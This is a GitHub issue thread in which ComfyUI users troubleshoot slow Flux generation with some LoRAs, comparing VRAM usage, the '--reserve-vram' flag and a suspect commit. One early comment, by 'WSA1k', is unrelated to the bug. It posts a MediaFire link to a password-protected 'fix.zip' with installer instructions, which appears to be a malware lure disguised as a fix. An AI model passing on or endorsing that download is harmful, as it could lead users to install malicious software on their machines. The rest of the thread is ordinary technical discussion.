### ISSUE TITLE
Slow generation times in Flux, using some loras.

### ISSUE THREAD

**Issue by JorgeR81** [comfyanonymous/ComfyUI#4618]
### Expected Behavior

To be able to use all Flux loras, with normal generation times

### Actual Behavior

I can run Flux FP8 with small size loras ( _e.g. **XLabs Realism** - 22 MB_ ), with practically the same generation times.
https://huggingface.co/comfyanonymous/flux_RealismLora_converted_comfyui/tree/main

But with a medium size lora ( _e.g. **Boring Reality** -164 MB_ ) generation times are more than 2x slower.
https://civitai.com/models/639937/boreal-fd-boring-reality-flux-dev-lora
                         
Can this be optimized ?

### Steps to Reproduce

Used the default UNET workflow, with the `LoraLoaderModelOnly` node

### Debug Logs

```powershell
.
```

### Other

GTX 1070 ( 8GB )
32 GB RAM
Windows 10

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JorgeR81** [comment]
It seems that other small loras are also slow ( _e.g. **epiCFluX-Photo** - 18 MB_ )
https://civitai.com/models/651187/epicflux-photo-lora

The Xlabs lora that works well was converted for Comfy UI.
Could this be some compatibility problem ?

**Comment by JorgeR81** [comment]
Using XLabs loras and/or GGUF models performance seems to be good.

This issue only seems to happen with other loras, paired with Flux FP8 / FP16

@city96 noticed that XLabs loras are using one merged qkv key, instead of separate q/k/v keys.

https://github.com/city96/ComfyUI-GGUF/issues/33#issuecomment-2310735260

**Comment by comfyanonymous** [comment]
Can you check if it's fixed now?

**Comment by JorgeR81** [comment]
I see some improvement, but it's not completely fixed. 

On the first try, I used the lora right after starting Comfy UI. 
And generation times were even slower. 

But then I restarted Comfy UI, and on the first run, I used the workflow without a lora.
On the second run, with the lora, speeds were only about 35% worse ( insted of like 110% worse ).
This trick never worked before.

But with XLabs or GUFF models, loras work on the first run and the slowdown is minimal ( maybe 5% or 10% tops ).

**Comment by JorgeR81** [comment]
I'm starting to see a pattern here. 

After the last successful try, I generated again, with another seed. 
It worked well for 3 or 4 steps, and then slowed down massively, over 100%

Then, I made the same test again, with similar results: 
- If the lora is used on the first run ( after starting Comfy UI ), there is a massive slow down, right after the step 1.
- If used on the second run ( after starting Comfy UI ), it works OK ( only 17 % slowdown this time, with a 25 step generation ).
- After the successful run ( with another seed ), it slows down again, after 3 or 4 steps.

When it slows down there are GPU spikes. These never happen in normal use. 

![gpu](https://github.com/user-attachments/assets/72d24741-55cd-4dc7-aea6-670d174e0d00)

**Comment by dan4ik94** [comment]
@comfyanonymous I can confirm the generation time is 10 times slower now with >= 2 loras (rtx 3060)
![ZnI3klP23u](https://github.com/user-attachments/assets/8247c28b-69f7-4a79-b86d-8fa85ec2bd38)

It should be 40-60 seconds.

**Comment by comfyanonymous** [comment]
if you add: `--reserve-vram 0.8` does it improve things? If it doesn't try increasing the number by 0.2 until it fixes it and then tell me what the number is.

**Comment by dan4ik94** [comment]
> if you add: `--reserve-vram 0.8` does it improve things? If it doesn't try increasing the number by 0.2 until it fixes it and then tell me what the number is.

No, doesn't have any effect, I was already on 0.7. This commit (7985ff88b9a7099378b5f2026bee5da63d3fc53f) slows down everything.

**Comment by JorgeR81** [comment]
No effect for me either.

**Comment by JorgeR81** [comment]
Wait, it seems `--reserve-vram 1.2` is working !
 
No slow down at all !
I worked on the first run, after starting Comfy UI.


The VRAM usage started at 7.3 GB and increased to 7.6 GB, during the 25 steps. 
The 7.3 ~ 7.6 GB range is my normal VRAM usage. 

Without this flag, when using the lora ( successfully, but with some slowdown ) it was at 7.7 GB
And when it slowed down massively is went up to to 7.8 GB

---

--`reserve-vram 0.8` didn't work -- VRAM usage when to 7.8 GB

I will try `--reserve-vram 1.0`

**Comment by dan4ik94** [comment]
No changes on my side with 1.0 and 1.2, 2 flux loras. The only solution for me is reverting the https://github.com/comfyanonymous/ComfyUI/commit/7985ff88b9a7099378b5f2026bee5da63d3fc53f

**Comment by JorgeR81** [comment]
`--reserve-vram 1.0` also works. 

It starts at 7.6 GB and goes up to 7.7 GB usage, during the 25 steps. 
But it never slows down.

This is right on the limit, with only one 292 MB lora.
Maybe I will need a higher reserve to use more loras or larger loras ?

**Comment by JorgeR81** [comment]
Sadly `--reserve-vram 1.2` it does not work for multiple loras.

Even 2 loras ( 292 MB + 292 MB ) makes the GPU crazy, before the first step ( with 7.7. GB usage )

![gpu](https://github.com/user-attachments/assets/a33e3be0-5bd6-496c-b4da-4f4e960289c8)


---

**But it works if one of the 2 loras is an XLabs lora !**

**Comment by JorgeR81** [comment]
> I can confirm the generation time is extremely slower now with >= 2 loras (rtx 3060)

So now my problem is similar to @dan4ik94 ?

@dan4ik94, can you try 2 loras, 1 of them being XLabs, and see if it works for you?

https://huggingface.co/XLabs-AI/flux-lora-collection/tree/main

**Comment by JorgeR81** [comment]
I can also use multiple loras, with GGUF models, without significant slowdown.   

@dan4ik94, can you also try that ?

---

I asked about this, a few days ago, and @city96 had some insights:
 
https://github.com/city96/ComfyUI-GGUF/issues/64#issuecomment-2307772571

**Comment by JorgeR81** [comment]
I tried `--reserve-vram 1.2`, with  even smaller loras ( 19 MB + 19 MB )  , in a 512 x 512 generation, but it still has the same issue.
Can't even do the first step.

**Comment by JorgeR81** [comment]
I tried `--reserve-vram 1.4` with the loras that gave errors.

They still dont work, but there are less errors:

```
got prompt
Using pytorch attention in VAE
Using pytorch attention in VAE
model weight dtype torch.float8_e4m3fn, manual cast: torch.float16
model_type FLUX
clip missing: ['text_projection.weight']
Requested to load FluxClipModel_
Loading 1 new model
loaded completely 0.0 4777.53759765625 True
Requested to load Flux
Loading 1 new model
ERROR lora diffusion_model.single_blocks.22.linear2.weight Allocation on device
ERROR lora diffusion_model.single_blocks.22.linear2.weight Allocation on device
loaded partially 5494.644037078858 5494.517578125 205
  0%|                                                                                           | 0/25 [00:00<?, ?it/s]
```

**Comment by dan4ik94** [comment]
After a few more tests seems like the speed is very random. Some loras of the same size are fast, the others are very slow.
Strange.

**Comment by deepfree2023** [comment]
@ltdrdata Hi, I saw that the problem was not fixed yet, why the issue was closed?

**Comment by ltdrdata** [comment]
> @ltdrdata Hi, I saw that the problem was not fixed yet, why the issue was closed?

It was closed because it was reported to have been resolved here through `--reserve-vram`.
https://github.com/comfyanonymous/ComfyUI/issues/4618#issuecomment-2311352103
The issue with very large loras is clearly a case of exceeding resources, so it's outside the scope of this issue.

**Comment by JorgeR81** [comment]
Yes, when I made my initial comment, I was under the impression that this issue was caused by the lora size. 
But then I realised it was not the case, so I changed the title from:

- **_Slow generation times in Flux, using medium size loras_**. 

to: 

-  **_Slow generation times in Flux, using some loras_**

So should I open another issue ?
What should I call it ?
 ( I think the current title describes the situation correctly )

Maybe call it:  "_**Slow performance with non XLabs loras**_". 
Should I open this ?

**Comment by ltdrdata** [comment]
> Yes, when I made my initial comment, I was under the impression that this issue was caused by the lora size.  But then I realised it was not the case, so I changed the title from:
> 
> * **_Slow generation times in Flux, using medium size loras_**.
> 
> to:
> 
> * **_Slow generation times in Flux, using some loras_**
> 
> So should I open another issue ? What should I call it ? ( I think the current title describes the situation correctly )
> 
> Maybe call it: "_**Slow generation times in Flux, using non XLabs loras**_".  Should I open this ?

It wouldn't make sense if this issue is simply due to the size of the LoRA.

However, if the issue occurs even when the LoRA size is small enough not to be problematic on your system.
In that case, it would be helpful to create an issue with detailed information comparing which specific LoRAs cause this issue and which ones don't.

And in this case, you should include your exact system environment:
OS, RAM size, GPU, and installed PyTorch version.
(PyTorch 2.4.0 is known to cause memory leak issues on Windows.)

**Comment by unlagi** [comment]
> Wait, it seems `--reserve-vram 1.2` is working !
> 
> No slow down at all ! I worked on the first run, after starting Comfy UI.
> 
> The VRAM usage started at 7.3 GB and increased to 7.6 GB, during the 25 steps. The 7.3 ~ 7.6 GB range is my normal VRAM usage.
> 
> Without this flag, when using the lora ( successfully, but with some slowdown ) it was at 7.7 GB And when it slowed down massively is went up to to 7.8 GB
> 
> `--reserve-vram 0.8` didn't work. VRAM usage when to 7.8 GB
> 
> I will try `--reserve-vram 1.0`
> 
> The lora I'm testing is 292 MB, by the way.

I don't know  why but it's also work for me! , 
from 1xxs/it back to 7.xxs/it even i use 4 loras . 
Thanks for the trick!

**Comment by scofano** [comment]
I'm having the same issue. 2 Loras and sometimes even 1 lora depending on the lora. I don't know how to evaluate the type of lora, but this one, for example, with flux.d causes super slowdown: https://civitai.com/models/645425/flux-syntheticanime

**Comment by JorgeR81** [comment]
This issue is probably going to stay closed.
As suggested above, I reopened the issue here: https://github.com/comfyanonymous/ComfyUI/issues/4674

It has a better description of the issue, with more testing, and my current workarounds.

**Comment by Archviz360** [comment]
i have same issue. it takes nealy one hour to generate a single image using loras but when im using old general ai like SDXL it is fast like realtime. if some one have a simple explanation please contact me. also as long i dont use any loras with flux it goes faster.
